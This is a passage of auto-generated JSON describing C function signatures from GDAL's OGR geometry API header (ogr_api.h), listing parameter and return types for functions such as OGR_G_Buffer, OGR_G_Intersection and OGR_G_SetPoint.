"OGR_G_SimplifyPreserveTopology", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:155:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hThis", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "tolerance", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_DelaunayTriangulation", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:156:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hThis", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "dfTolerance", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "bOnlyEdges", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_Segmentize", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:158:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "dfMaxLength", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_Intersects", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:159:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Equals", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:160:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Disjoint", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:162:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Touches", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:163:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Crosses", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:164:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Within", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:165:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Contains", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:166:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Overlaps", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:167:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Boundary", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:169:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ConvexHull", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:170:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_Buffer", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:171:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_Intersection", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:172:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_Union", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:173:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_UnionCascaded", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:174:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_PointOnSurface", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:175:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_Difference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:180:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_SymDifference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:181:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_Distance", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:182:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_Distance3D", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:183:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_Length", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:184:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_Area", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:185:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_Centroid", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:186:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Value", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:187:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "dfDistance", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_Empty", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:189:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_IsEmpty", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:190:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_IsValid", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:191:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_IsSimple", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:193:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_IsRing", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:194:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Polygonize", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:196:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_Intersect", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:200:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Equal", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:201:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_SymmetricDifference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:202:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_GetArea", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:203:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_GetBoundary", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:204:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_GetPointCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:208:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_GetPoints", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:209:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "pabyX", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nXStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyY", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nYStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyZ", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nZStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_GetPointsZM", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:213:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "pabyX", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nXStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyY", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nYStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyZ", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nZStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyM", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nMStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_GetX", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:218:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_GetY", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:219:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_GetZ", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:220:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_GetM", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:221:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_G_GetPoint", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:222:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "iPoint", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_GetPointZM", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:224:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "iPoint", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SetPointCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:226:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "nNewPointCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SetPoint", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:227:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "iPoint", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SetPoint_2D", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:229:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "iPoint", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SetPointM", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:231:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "iPoint", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SetPointZM", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:233:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "iPoint", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_AddPoint", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:235:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_AddPoint_2D", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:236:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_AddPointM", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:237:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_AddPointZM", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:238:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SetPoints", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:239:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "nPointsIn", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyX", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nXStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyY", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nYStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyZ", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nZStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SetPointsZM", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:243:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "nPointsIn", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyX", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nXStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyY", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nYStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyZ", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nZStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pabyM", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nMStride", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SwapXY", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:248:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_GetGeometryCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:252:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_GetGeometryRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:253:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_AddGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:254:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_AddGeometryDirectly", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:255:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_RemoveGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:256:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_HasCurveGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:258:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "bLookForNonLinear", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_GetLinearGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:259:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "dfMaxAngleStepSizeDegrees", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], 